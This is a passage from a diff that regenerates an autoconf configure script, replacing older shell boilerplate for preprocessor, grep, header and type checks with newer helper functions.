$ac_preproc_ok; then +if $ac_preproc_ok; then : break fi @@ -3792,8 +4418,8 @@ fi else ac_cv_prog_CPP=$CPP fi -{ echo "$as_me:$LINENO: result: $CPP" >&5 -echo "${ECHO_T}$CPP" >&6; } +{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $CPP" >&5 +$as_echo "$CPP" >&6; } ac_preproc_ok=false for ac_c_preproc_warn_flag in '' yes do @@ -3803,11 +4429,7 @@ do # exists even on freestanding compilers. # On the NeXT, cc -E runs the code through the compiler's parser, # not just through cpp. "Syntax error" is here to catch this case. - cat >conftest.$ac_ext <<_ACEOF -/* confdefs.h. */ -_ACEOF -cat confdefs.h >>conftest.$ac_ext -cat >>conftest.$ac_ext <<_ACEOF + cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ #ifdef __STDC__ # include @@ -3816,83 +4438,40 @@ cat >>conftest.$ac_ext <<_ACEOF #endif Syntax error _ACEOF -if { (ac_try="$ac_cpp conftest.$ac_ext" -case "(($ac_try" in - *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; - *) ac_try_echo=$ac_try;; -esac -eval "echo \"\$as_me:$LINENO: $ac_try_echo\"") >&5 - (eval "$ac_cpp conftest.$ac_ext") 2>conftest.er1 - ac_status=$? - grep -v '^ *+' conftest.er1 >conftest.err - rm -f conftest.er1 - cat conftest.err >&5 - echo "$as_me:$LINENO: \$? = $ac_status" >&5 - (exit $ac_status); } >/dev/null && { - test -z "$ac_c_preproc_warn_flag$ac_c_werror_flag" || - test ! -s conftest.err - }; then - : -else - echo "$as_me: failed program was:" >&5 -sed 's/^/| /' conftest.$ac_ext >&5 +if ac_fn_c_try_cpp "$LINENO"; then : +else # Broken: fails on valid input. continue fi - rm -f conftest.err conftest.$ac_ext # OK, works on sane cases. Now check whether nonexistent headers # can be detected and how. - cat >conftest.$ac_ext <<_ACEOF -/* confdefs.h. */ -_ACEOF -cat confdefs.h >>conftest.$ac_ext -cat >>conftest.$ac_ext <<_ACEOF + cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ #include _ACEOF -if { (ac_try="$ac_cpp conftest.$ac_ext" -case "(($ac_try" in - *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; - *) ac_try_echo=$ac_try;; -esac -eval "echo \"\$as_me:$LINENO: $ac_try_echo\"") >&5 - (eval "$ac_cpp conftest.$ac_ext") 2>conftest.er1 - ac_status=$? - grep -v '^ *+' conftest.er1 >conftest.err - rm -f conftest.er1 - cat conftest.err >&5 - echo "$as_me:$LINENO: \$? = $ac_status" >&5 - (exit $ac_status); } >/dev/null && { - test -z "$ac_c_preproc_warn_flag$ac_c_werror_flag" || - test ! -s conftest.err - }; then +if ac_fn_c_try_cpp "$LINENO"; then : # Broken: success on invalid input. continue else - echo "$as_me: failed program was:" >&5 -sed 's/^/| /' conftest.$ac_ext >&5 - # Passes both tests. ac_preproc_ok=: break fi - rm -f conftest.err conftest.$ac_ext done # Because of `break', _AC_PREPROC_IFELSE's cleaning code was skipped. rm -f conftest.err conftest.$ac_ext -if $ac_preproc_ok; then - : +if $ac_preproc_ok; then : + else - { { echo "$as_me:$LINENO: error: C preprocessor \"$CPP\" fails sanity check -See \`config.log' for more details." >&5 -echo "$as_me: error: C preprocessor \"$CPP\" fails sanity check -See \`config.log' for more details." >&2;} - { (exit 1); exit 1; }; } + { { $as_echo "$as_me:${as_lineno-$LINENO}: error: in \`$ac_pwd':" >&5 +$as_echo "$as_me: error: in \`$ac_pwd':" >&2;} +as_fn_error "C preprocessor \"$CPP\" fails sanity check +See \`config.log' for more details." "$LINENO" 5; } fi ac_ext=c @@ -3902,45 +4481,40 @@ ac_link='$CC -o conftest$ac_exeext $CFLAGS $CPPFLAGS $LDFLAGS conftest.$ac_ext $ ac_compiler_gnu=$ac_cv_c_compiler_gnu -{ echo "$as_me:$LINENO: checking for grep that handles long lines and -e" >&5 -echo $ECHO_N "checking for grep that handles long lines and -e... $ECHO_C" >&6; } -if test "${ac_cv_path_GREP+set}" = set; then - echo $ECHO_N "(cached) $ECHO_C" >&6 -else - # Extract the first word of "grep ggrep" to use in msg output -if test -z "$GREP"; then -set dummy grep ggrep; ac_prog_name=$2 -if test "${ac_cv_path_GREP+set}" = set; then - echo $ECHO_N "(cached) $ECHO_C" >&6 +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking for grep that handles long lines and -e" >&5 +$as_echo_n "checking for grep that handles long lines and -e... " >&6; } +if test "${ac_cv_path_GREP+set}" = set; then : + $as_echo_n "(cached) " >&6 else + if test -z "$GREP"; then ac_path_GREP_found=false -# Loop through the user's path and test for each of PROGNAME-LIST -as_save_IFS=$IFS; IFS=$PATH_SEPARATOR + # Loop through the user's path and test for each of PROGNAME-LIST + as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH$PATH_SEPARATOR/usr/xpg4/bin do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. - for ac_prog in grep ggrep; do - for ac_exec_ext in '' $ac_executable_extensions; do - ac_path_GREP="$as_dir/$ac_prog$ac_exec_ext" - { test -f "$ac_path_GREP" && $as_test_x "$ac_path_GREP"; } || continue - # Check for GNU ac_path_GREP and select it if it is found. + for ac_prog in grep ggrep; do + for ac_exec_ext in '' $ac_executable_extensions; do + ac_path_GREP="$as_dir/$ac_prog$ac_exec_ext" + { test -f "$ac_path_GREP" && $as_test_x "$ac_path_GREP"; } || continue +# Check for GNU ac_path_GREP and select it if it is found. # Check for GNU $ac_path_GREP case `"$ac_path_GREP" --version 2>&1` in *GNU*) ac_cv_path_GREP="$ac_path_GREP" ac_path_GREP_found=:;; *) ac_count=0 - echo $ECHO_N "0123456789$ECHO_C" >"conftest.in" + $as_echo_n 0123456789 >"conftest.in" while : do cat "conftest.in" "conftest.in" >"conftest.tmp" mv "conftest.tmp" "conftest.in" cp "conftest.in" "conftest.nl" - echo 'GREP' >> "conftest.nl" + $as_echo 'GREP' >> "conftest.nl" "$ac_path_GREP" -e 'GREP$' -e '-(cannot match)-' < "conftest.nl" >"conftest.out" 2>/dev/null || break diff "conftest.out" "conftest.nl" >/dev/null 2>&1 || break - ac_count=`expr $ac_count + 1` + as_fn_arith $ac_count + 1 && ac_count=$as_val if test $ac_count -gt ${ac_path_GREP_max-0}; then # Best one so far, save it but keep looking for a better one ac_cv_path_GREP="$ac_path_GREP" @@ -3952,77 +4526,61 @@ case `"$ac_path_GREP" --version 2>&1` in rm -f conftest.in conftest.tmp conftest.nl conftest.out;; esac - - $ac_path_GREP_found && break 3 + $ac_path_GREP_found && break 3 + done + done done -done - -done IFS=$as_save_IFS - - -fi - -GREP="$ac_cv_path_GREP" -if test -z "$GREP"; then - { { echo "$as_me:$LINENO: error: no acceptable $ac_prog_name could be found in $PATH$PATH_SEPARATOR/usr/xpg4/bin" >&5 -echo "$as_me: error: no acceptable $ac_prog_name could be found in $PATH$PATH_SEPARATOR/usr/xpg4/bin" >&2;} - { (exit 1); exit 1; }; } -fi - + if test -z "$ac_cv_path_GREP"; then + as_fn_error "no acceptable grep could be found in $PATH$PATH_SEPARATOR/usr/xpg4/bin" "$LINENO" 5 + fi else ac_cv_path_GREP=$GREP fi - fi -{ echo "$as_me:$LINENO: result: $ac_cv_path_GREP" >&5 -echo "${ECHO_T}$ac_cv_path_GREP" >&6; } +{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_cv_path_GREP" >&5 +$as_echo "$ac_cv_path_GREP" >&6; } GREP="$ac_cv_path_GREP" -{ echo "$as_me:$LINENO: checking for egrep" >&5 -echo $ECHO_N "checking for egrep... $ECHO_C" >&6; } -if test "${ac_cv_path_EGREP+set}" = set; then - echo $ECHO_N "(cached) $ECHO_C" >&6 +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking for egrep" >&5 +$as_echo_n "checking for egrep... " >&6; } +if test "${ac_cv_path_EGREP+set}" = set; then : + $as_echo_n "(cached) " >&6 else if echo a | $GREP -E '(a|b)' >/dev/null 2>&1 then ac_cv_path_EGREP="$GREP -E" else - # Extract the first word of "egrep" to use in msg output -if test -z "$EGREP"; then -set dummy egrep; ac_prog_name=$2 -if test "${ac_cv_path_EGREP+set}" = set; then - echo $ECHO_N "(cached) $ECHO_C" >&6 -else + if test -z "$EGREP"; then ac_path_EGREP_found=false -# Loop through the user's path and test for each of PROGNAME-LIST -as_save_IFS=$IFS; IFS=$PATH_SEPARATOR + # Loop through the user's path and test for each of PROGNAME-LIST + as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH$PATH_SEPARATOR/usr/xpg4/bin do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. - for ac_prog in egrep; do - for ac_exec_ext in '' $ac_executable_extensions; do - ac_path_EGREP="$as_dir/$ac_prog$ac_exec_ext" - { test -f "$ac_path_EGREP" && $as_test_x "$ac_path_EGREP"; } || continue - # Check for GNU ac_path_EGREP and select it if it is found. + for ac_prog in egrep; do + for ac_exec_ext in '' $ac_executable_extensions; do + ac_path_EGREP="$as_dir/$ac_prog$ac_exec_ext" + { test -f "$ac_path_EGREP" && $as_test_x "$ac_path_EGREP"; } || continue +# Check for GNU ac_path_EGREP and select it if it is found. # Check for GNU $ac_path_EGREP case `"$ac_path_EGREP" --version 2>&1` in *GNU*) ac_cv_path_EGREP="$ac_path_EGREP" ac_path_EGREP_found=:;; *) ac_count=0 - echo $ECHO_N "0123456789$ECHO_C" >"conftest.in" + $as_echo_n 0123456789 >"conftest.in" while : do cat "conftest.in" "conftest.in" >"conftest.tmp" mv "conftest.tmp" "conftest.in" cp "conftest.in" "conftest.nl" - echo 'EGREP' >> "conftest.nl" + $as_echo 'EGREP' >> "conftest.nl" "$ac_path_EGREP" 'EGREP$' < "conftest.nl" >"conftest.out" 2>/dev/null || break diff "conftest.out" "conftest.nl" >/dev/null 2>&1 || break - ac_count=`expr $ac_count + 1` + as_fn_arith $ac_count + 1 && ac_count=$as_val if test $ac_count -gt ${ac_path_EGREP_max-0}; then # Best one so far, save it but keep looking for a better one ac_cv_path_EGREP="$ac_path_EGREP" @@ -4034,46 +4592,31 @@ case `"$ac_path_EGREP" --version 2>&1` in rm -f conftest.in conftest.tmp conftest.nl conftest.out;; esac - - $ac_path_EGREP_found && break 3 + $ac_path_EGREP_found && break 3 + done + done done -done - -done IFS=$as_save_IFS - - -fi - -EGREP="$ac_cv_path_EGREP" -if test -z "$EGREP"; then - { { echo "$as_me:$LINENO: error: no acceptable $ac_prog_name could be found in $PATH$PATH_SEPARATOR/usr/xpg4/bin" >&5 -echo "$as_me: error: no acceptable $ac_prog_name could be found in $PATH$PATH_SEPARATOR/usr/xpg4/bin" >&2;} - { (exit 1); exit 1; }; } -fi - + if test -z "$ac_cv_path_EGREP"; then + as_fn_error "no acceptable egrep could be found in $PATH$PATH_SEPARATOR/usr/xpg4/bin" "$LINENO" 5 + fi else ac_cv_path_EGREP=$EGREP fi - fi fi -{ echo "$as_me:$LINENO: result: $ac_cv_path_EGREP" >&5 -echo "${ECHO_T}$ac_cv_path_EGREP" >&6; } +{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_cv_path_EGREP" >&5 +$as_echo "$ac_cv_path_EGREP" >&6; } EGREP="$ac_cv_path_EGREP" -{ echo "$as_me:$LINENO: checking for ANSI C header files" >&5 -echo $ECHO_N "checking for ANSI C header files... $ECHO_C" >&6; } -if test "${ac_cv_header_stdc+set}" = set; then - echo $ECHO_N "(cached) $ECHO_C" >&6 +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking for ANSI C header files" >&5 +$as_echo_n "checking for ANSI C header files... " >&6; } +if test "${ac_cv_header_stdc+set}" = set; then : + $as_echo_n "(cached) " >&6 else - cat >conftest.$ac_ext <<_ACEOF -/* confdefs.h. */ -_ACEOF -cat confdefs.h >>conftest.$ac_ext -cat >>conftest.$ac_ext <<_ACEOF + cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ #include #include @@ -4088,85 +4631,53 @@ main () return 0; } _ACEOF -rm -f conftest.$ac_objext -if { (ac_try="$ac_compile" -case "(($ac_try" in - *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; - *) ac_try_echo=$ac_try;; -esac -eval "echo \"\$as_me:$LINENO: $ac_try_echo\"") >&5 - (eval "$ac_compile") 2>conftest.er1 - ac_status=$? - grep -v '^ *+' conftest.er1 >conftest.err - rm -f conftest.er1 - cat conftest.err >&5 - echo "$as_me:$LINENO: \$? = $ac_status" >&5 - (exit $ac_status); } && { - test -z "$ac_c_werror_flag" || - test ! -s conftest.err - } && test -s conftest.$ac_objext; then +if ac_fn_c_try_compile "$LINENO"; then : ac_cv_header_stdc=yes else - echo "$as_me: failed program was:" >&5 -sed 's/^/| /' conftest.$ac_ext >&5 - - ac_cv_header_stdc=no + ac_cv_header_stdc=no fi - rm -f core conftest.err conftest.$ac_objext conftest.$ac_ext if test $ac_cv_header_stdc = yes; then # SunOS 4.x string.h does not declare mem*, contrary to ANSI. - cat >conftest.$ac_ext <<_ACEOF -/* confdefs.h. */ -_ACEOF -cat confdefs.h >>conftest.$ac_ext -cat >>conftest.$ac_ext <<_ACEOF + cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ #include _ACEOF if (eval "$ac_cpp conftest.$ac_ext") 2>&5 | - $EGREP "memchr" >/dev/null 2>&1; then - : + $EGREP "memchr" >/dev/null 2>&1; then : + else ac_cv_header_stdc=no fi -rm -f -r conftest* +rm -f conftest* fi if test $ac_cv_header_stdc = yes; then # ISC 2.0.2 stdlib.h does not declare free, contrary to ANSI. - cat >conftest.$ac_ext <<_ACEOF -/* confdefs.h. */ -_ACEOF -cat confdefs.h >>conftest.$ac_ext -cat >>conftest.$ac_ext <<_ACEOF + cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ #include _ACEOF if (eval "$ac_cpp conftest.$ac_ext") 2>&5 | - $EGREP "free" >/dev/null 2>&1; then - : + $EGREP "free" >/dev/null 2>&1; then : + else ac_cv_header_stdc=no fi -rm -f -r conftest* +rm -f conftest* fi if test $ac_cv_header_stdc = yes; then # /bin/cc in Irix-4.0.5 gets non-ANSI ctype macros unless using -ansi. - if test "$cross_compiling" = yes; then + if test "$cross_compiling" = yes; then : : else - cat >conftest.$ac_ext <<_ACEOF -/* confdefs.h. */ -_ACEOF -cat confdefs.h >>conftest.$ac_ext -cat >>conftest.$ac_ext <<_ACEOF + cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ #include #include @@ -4193,61 +4704,31 @@ main () return 0; } _ACEOF -rm -f conftest$ac_exeext -if { (ac_try="$ac_link" -case "(($ac_try" in - *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; - *) ac_try_echo=$ac_try;; -esac -eval "echo \"\$as_me:$LINENO: $ac_try_echo\"") >&5 - (eval "$ac_link") 2>&5 - ac_status=$? - echo "$as_me:$LINENO: \$? = $ac_status" >&5 - (exit $ac_status); } && { ac_try='./conftest$ac_exeext' - { (case "(($ac_try" in - *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; - *) ac_try_echo=$ac_try;; -esac -eval "echo \"\$as_me:$LINENO: $ac_try_echo\"") >&5 - (eval "$ac_try") 2>&5 - ac_status=$? - echo "$as_me:$LINENO: \$? = $ac_status" >&5 - (exit $ac_status); }; }; then - : +if ac_fn_c_try_run "$LINENO"; then : + else - echo "$as_me: program exited with status $ac_status" >&5 -echo "$as_me: failed program was:" >&5 -sed 's/^/| /' conftest.$ac_ext >&5 - -( exit $ac_status ) -ac_cv_header_stdc=no + ac_cv_header_stdc=no fi -rm -f core *.core core.conftest.* gmon.out bb.out conftest$ac_exeext conftest.$ac_objext conftest.$ac_ext +rm -f core *.core core.conftest.* gmon.out bb.out conftest$ac_exeext \ + conftest.$ac_objext conftest.beam conftest.$ac_ext fi - fi fi -{ echo "$as_me:$LINENO: result: $ac_cv_header_stdc" >&5 -echo "${ECHO_T}$ac_cv_header_stdc" >&6; } +{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_cv_header_stdc" >&5 +$as_echo "$ac_cv_header_stdc" >&6; } if test $ac_cv_header_stdc = yes; then -cat >>confdefs.h <<\_ACEOF -#define STDC_HEADERS 1 -_ACEOF +$as_echo "#define STDC_HEADERS 1" >>confdefs.h fi -{ echo "$as_me:$LINENO: checking for sys/wait.h that is POSIX.1 compatible" >&5 -echo $ECHO_N "checking for sys/wait.h that is POSIX.1 compatible... $ECHO_C" >&6; } -if test "${ac_cv_header_sys_wait_h+set}" = set; then - echo $ECHO_N "(cached) $ECHO_C" >&6 +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking for sys/wait.h that is POSIX.1 compatible" >&5 +$as_echo_n "checking for sys/wait.h that is POSIX.1 compatible... " >&6; } +if test "${ac_cv_header_sys_wait_h+set}" = set; then : + $as_echo_n "(cached) " >&6 else - cat >conftest.$ac_ext <<_ACEOF -/* confdefs.h. */ -_ACEOF -cat confdefs.h >>conftest.$ac_ext -cat >>conftest.$ac_ext <<_ACEOF + cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ #include #include @@ -4268,105 +4749,32 @@ main () return 0; } _ACEOF -rm -f conftest.$ac_objext -if { (ac_try="$ac_compile" -case "(($ac_try" in - *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; - *) ac_try_echo=$ac_try;; -esac -eval "echo \"\$as_me:$LINENO: $ac_try_echo\"") >&5 - (eval "$ac_compile") 2>conftest.er1 - ac_status=$? - grep -v '^ *+' conftest.er1 >conftest.err - rm -f conftest.er1 - cat conftest.err >&5 - echo "$as_me:$LINENO: \$? = $ac_status" >&5 - (exit $ac_status); } && { - test -z "$ac_c_werror_flag" || - test ! -s conftest.err - } && test -s conftest.$ac_objext; then +if ac_fn_c_try_compile "$LINENO"; then : ac_cv_header_sys_wait_h=yes else - echo "$as_me: failed program was:" >&5 -sed 's/^/| /' conftest.$ac_ext >&5 - - ac_cv_header_sys_wait_h=no + ac_cv_header_sys_wait_h=no fi - rm -f core conftest.err conftest.$ac_objext conftest.$ac_ext fi -{ echo "$as_me:$LINENO: result: $ac_cv_header_sys_wait_h" >&5 -echo "${ECHO_T}$ac_cv_header_sys_wait_h" >&6; } +{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_cv_header_sys_wait_h" >&5 +$as_echo "$ac_cv_header_sys_wait_h" >&6; } if test $ac_cv_header_sys_wait_h = yes; then -cat >>confdefs.h <<\_ACEOF -#define HAVE_SYS_WAIT_H 1 -_ACEOF +$as_echo "#define HAVE_SYS_WAIT_H 1" >>confdefs.h fi # On IRIX 5.3, sys/types and inttypes.h are conflicting. - - - - - - - - - for ac_header in sys/types.h sys/stat.h stdlib.h string.h memory.h strings.h \ inttypes.h stdint.h unistd.h -do -as_ac_Header=`echo "ac_cv_header_$ac_header" | $as_tr_sh` -{ echo "$as_me:$LINENO: checking for $ac_header" >&5 -echo $ECHO_N "checking for $ac_header... $ECHO_C" >&6; } -if { as_var=$as_ac_Header; eval "test \"\${$as_var+set}\" = set"; }; then - echo $ECHO_N "(cached) $ECHO_C" >&6 -else - cat >conftest.$ac_ext <<_ACEOF -/* confdefs.h. */ -_ACEOF -cat confdefs.h >>conftest.$ac_ext -cat >>conftest.$ac_ext <<_ACEOF -/* end confdefs.h. */ -$ac_includes_default - -#include <$ac_header> -_ACEOF -rm -f conftest.$ac_objext -if { (ac_try="$ac_compile" -case "(($ac_try" in - *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; - *) ac_try_echo=$ac_try;; -esac -eval "echo \"\$as_me:$LINENO: $ac_try_echo\"") >&5 - (eval "$ac_compile") 2>conftest.er1 - ac_status=$? - grep -v '^ *+' conftest.er1 >conftest.err - rm -f conftest.er1 - cat conftest.err >&5 - echo "$as_me:$LINENO: \$? = $ac_status" >&5 - (exit $ac_status); } && { - test -z "$ac_c_werror_flag" || - test ! -s conftest.err - } && test -s conftest.$ac_objext; then - eval "$as_ac_Header=yes" -else - echo "$as_me: failed program was:" >&5 -sed 's/^/| /' conftest.$ac_ext >&5 - - eval "$as_ac_Header=no" -fi - -rm -f core conftest.err conftest.$ac_objext conftest.$ac_ext -fi -ac_res=`eval echo '${'$as_ac_Header'}'` - { echo "$as_me:$LINENO: result: $ac_res" >&5 -echo "${ECHO_T}$ac_res" >&6; } -if test `eval echo '${'$as_ac_Header'}'` = yes; then +do : + as_ac_Header=`$as_echo "ac_cv_header_$ac_header" | $as_tr_sh` +ac_fn_c_check_header_compile "$LINENO" "$ac_header" "$as_ac_Header" "$ac_includes_default +" +eval as_val=\$$as_ac_Header + if test "x$as_val" = x""yes; then : cat >>confdefs.h <<_ACEOF -#define `echo "HAVE_$ac_header" | $as_tr_cpp` 1 +#define `$as_echo "HAVE_$ac_header" | $as_tr_cpp` 1 _ACEOF fi @@ -4374,155 +4782,14 @@ fi done - - - - - - - - - - - for ac_header in fcntl.h limits.h netdb.h netinet/in.h stdlib.h string.h sys/ioctl.h sys/socket.h sys/timeb.h syslog.h unistd.h -do -as_ac_Header=`echo "ac_cv_header_$ac_header" | $as_tr_sh` -if { as_var=$as_ac_Header; eval "test \"\${$as_var+set}\" = set"; }; then - { echo "$as_me:$LINENO: checking for $ac_header" >&5 -echo $ECHO_N "checking for $ac_header... $ECHO_C" >&6; } -if { as_var=$as_ac_Header; eval "test \"\${$as_var+set}\" = set"; }; then - echo $ECHO_N "(cached) $ECHO_C" >&6 -fi -ac_res=`eval echo '${'$as_ac_Header'}'` - { echo "$as_me:$LINENO: result: $ac_res" >&5 -echo "${ECHO_T}$ac_res" >&6; } -else - # Is the header compilable? -{ echo "$as_me:$LINENO: checking $ac_header usability" >&5 -echo $ECHO_N "checking $ac_header usability... $ECHO_C" >&6; } -cat >conftest.$ac_ext <<_ACEOF -/* confdefs.h. */ -_ACEOF -cat confdefs.h >>conftest.$ac_ext -cat >>conftest.$ac_ext <<_ACEOF -/* end confdefs.h. */ -$ac_includes_default -#include <$ac_header> -_ACEOF -rm -f conftest.$ac_objext -if { (ac_try="$ac_compile" -case "(($ac_try" in - *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; - *) ac_try_echo=$ac_try;; -esac -eval "echo \"\$as_me:$LINENO: $ac_try_echo\"") >&5 - (eval "$ac_compile") 2>conftest.er1 - ac_status=$? - grep -v '^ *+' conftest.er1 >conftest.err - rm -f conftest.er1 - cat conftest.err >&5 - echo "$as_me:$LINENO: \$? = $ac_status" >&5 - (exit $ac_status); } && { - test -z "$ac_c_werror_flag" || - test ! -s conftest.err - } && test -s conftest.$ac_objext; then - ac_header_compiler=yes -else - echo "$as_me: failed program was:" >&5 -sed 's/^/| /' conftest.$ac_ext >&5 - - ac_header_compiler=no -fi - -rm -f core conftest.err conftest.$ac_objext conftest.$ac_ext -{ echo "$as_me:$LINENO: result: $ac_header_compiler" >&5 -echo "${ECHO_T}$ac_header_compiler" >&6; } - -# Is the header present? -{ echo "$as_me:$LINENO: checking $ac_header presence" >&5 -echo $ECHO_N "checking $ac_header presence... $ECHO_C" >&6; } -cat >conftest.$ac_ext <<_ACEOF -/* confdefs.h. */ -_ACEOF -cat confdefs.h >>conftest.$ac_ext -cat >>conftest.$ac_ext <<_ACEOF -/* end confdefs.h. */ -#include <$ac_header> -_ACEOF -if { (ac_try="$ac_cpp conftest.$ac_ext" -case "(($ac_try" in - *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; - *) ac_try_echo=$ac_try;; -esac -eval "echo \"\$as_me:$LINENO: $ac_try_echo\"") >&5 - (eval "$ac_cpp conftest.$ac_ext") 2>conftest.er1 - ac_status=$? - grep -v '^ *+' conftest.er1 >conftest.err - rm -f conftest.er1 - cat conftest.err >&5 - echo "$as_me:$LINENO: \$? = $ac_status" >&5 - (exit $ac_status); } >/dev/null && { - test -z "$ac_c_preproc_warn_flag$ac_c_werror_flag" || - test ! -s conftest.err - }; then - ac_header_preproc=yes -else - echo "$as_me: failed program was:" >&5 -sed 's/^/| /' conftest.$ac_ext >&5 - - ac_header_preproc=no -fi - -rm -f conftest.err conftest.$ac_ext -{ echo "$as_me:$LINENO: result: $ac_header_preproc" >&5 -echo "${ECHO_T}$ac_header_preproc" >&6; } - -# So? What about this header? -case $ac_header_compiler:$ac_header_preproc:$ac_c_preproc_warn_flag in - yes:no: ) - { echo "$as_me:$LINENO: WARNING: $ac_header: accepted by the compiler, rejected by the preprocessor!" >&5 -echo "$as_me: WARNING: $ac_header: accepted by the compiler, rejected by the preprocessor!" >&2;} - { echo "$as_me:$LINENO: WARNING: $ac_header: proceeding with the compiler's result" >&5 -echo "$as_me: WARNING: $ac_header: proceeding with the compiler's result" >&2;} - ac_header_preproc=yes - ;; - no:yes:* ) - { echo "$as_me:$LINENO: WARNING: $ac_header: present but cannot be compiled" >&5 -echo "$as_me: WARNING: $ac_header: present but cannot be compiled" >&2;} - { echo "$as_me:$LINENO: WARNING: $ac_header: check for missing prerequisite headers?" >&5 -echo "$as_me: WARNING: $ac_header: check for missing prerequisite headers?" >&2;} - { echo "$as_me:$LINENO: WARNING: $ac_header: see the Autoconf documentation" >&5 -echo "$as_me: WARNING: $ac_header: see the Autoconf documentation" >&2;} - { echo "$as_me:$LINENO: WARNING: $ac_header: section \"Present But Cannot Be Compiled\"" >&5 -echo "$as_me: WARNING: $ac_header: section \"Present But Cannot Be Compiled\"" >&2;} - { echo "$as_me:$LINENO: WARNING: $ac_header: proceeding with the preprocessor's result" >&5 -echo "$as_me: WARNING: $ac_header: proceeding with the preprocessor's result" >&2;} - { echo "$as_me:$LINENO: WARNING: $ac_header: in the future, the compiler will take precedence" >&5 -echo "$as_me: WARNING: $ac_header: in the future, the compiler will take precedence" >&2;} - ( cat <<\_ASBOX -## --------------------------------- ## -## Report this to piotr@duszynski.eu ## -## --------------------------------- ## -_ASBOX - ) | sed "s/^/$as_me: WARNING: /" >&2 - ;; -esac -{ echo "$as_me:$LINENO: checking for $ac_header" >&5 -echo $ECHO_N "checking for $ac_header... $ECHO_C" >&6; } -if { as_var=$as_ac_Header; eval "test \"\${$as_var+set}\" = set"; }; then - echo $ECHO_N "(cached) $ECHO_C" >&6 -else - eval "$as_ac_Header=\$ac_header_preproc" -fi -ac_res=`eval echo '${'$as_ac_Header'}'` - { echo "$as_me:$LINENO: result: $ac_res" >&5 -echo "${ECHO_T}$ac_res" >&6; } - -fi -if test `eval echo '${'$as_ac_Header'}'` = yes; then +do : + as_ac_Header=`$as_echo "ac_cv_header_$ac_header" | $as_tr_sh` +ac_fn_c_check_header_mongrel "$LINENO" "$ac_header" "$as_ac_Header" "$ac_includes_default" +eval as_val=\$$as_ac_Header + if test "x$as_val" = x""yes; then : cat >>confdefs.h <<_ACEOF -#define `echo "HAVE_$ac_header" | $as_tr_cpp` 1 +#define `$as_echo "HAVE_$ac_header" | $as_tr_cpp` 1 _ACEOF fi @@ -4531,16 +4798,12 @@ done # Checks for typedefs, structures, and compiler characteristics. -{ echo "$as_me:$LINENO: checking for an ANSI C-conforming const" >&5 -echo $ECHO_N "checking for an ANSI C-conforming const... $ECHO_C" >&6; } -if test "${ac_cv_c_const+set}" = set; then - echo $ECHO_N "(cached) $ECHO_C" >&6 +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking for an ANSI C-conforming const" >&5 +$as_echo_n "checking for an ANSI C-conforming const... " >&6; } +if test "${ac_cv_c_const+set}" = set; then : + $as_echo_n "(cached) " >&6 else - cat >conftest.$ac_ext <<_ACEOF -/* confdefs.h. */ -_ACEOF -cat confdefs.h >>conftest.$ac_ext -cat >>conftest.$ac_ext <<_ACEOF + cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ int @@ -4600,98 +4863,24 @@ main () return 0; } _ACEOF -rm -f conftest.$ac_objext -if { (ac_try="$ac_compile" -case "(($ac_try" in - *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; - *) ac_try_echo=$ac_try;; -esac -eval "echo \"\$as_me:$LINENO: $ac_try_echo\"") >&5 - (eval "$ac_compile") 2>conftest.er1 - ac_status=$? - grep -v '^ *+' conftest.er1 >conftest.err - rm -f conftest.er1 - cat conftest.err >&5 - echo "$as_me:$LINENO: \$? = $ac_status" >&5 - (exit $ac_status); } && { - test -z "$ac_c_werror_flag" || - test ! -s conftest.err - } && test -s conftest.$ac_objext; then +if ac_fn_c_try_compile "$LINENO"; then : ac_cv_c_const=yes else - echo "$as_me: failed program was:" >&5 -sed 's/^/| /' conftest.$ac_ext >&5 - - ac_cv_c_const=no + ac_cv_c_const=no fi - rm -f core conftest.err conftest.$ac_objext conftest.$ac_ext fi -{ echo "$as_me:$LINENO: result: $ac_cv_c_const" >&5 -echo "${ECHO_T}$ac_cv_c_const" >&6; } +{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_cv_c_const" >&5 +$as_echo "$ac_cv_c_const" >&6; } if test $ac_cv_c_const = no; then -cat >>confdefs.h <<\_ACEOF -#define const -_ACEOF +$as_echo "#define const /**/" >>confdefs.h fi -{ echo "$as_me:$LINENO: checking for size_t" >&5 -echo $ECHO_N "checking for size_t... $ECHO_C" >&6; } -if test "${ac_cv_type_size_t+set}" = set; then - echo $ECHO_N "(cached) $ECHO_C" >&6 -else - cat >conftest.$ac_ext <<_ACEOF -/* confdefs.h. */ -_ACEOF -cat confdefs.h >>conftest.$ac_ext -cat >>conftest.$ac_ext <<_ACEOF -/* end confdefs.h. */ -$ac_includes_default -typedef size_t ac__type_new_; -int -main () -{ -if ((ac__type_new_ *) 0) - return 0; -if (sizeof (ac__type_new_)) - return 0; - ; - return 0; -} -_ACEOF -rm -f conftest.$ac_objext 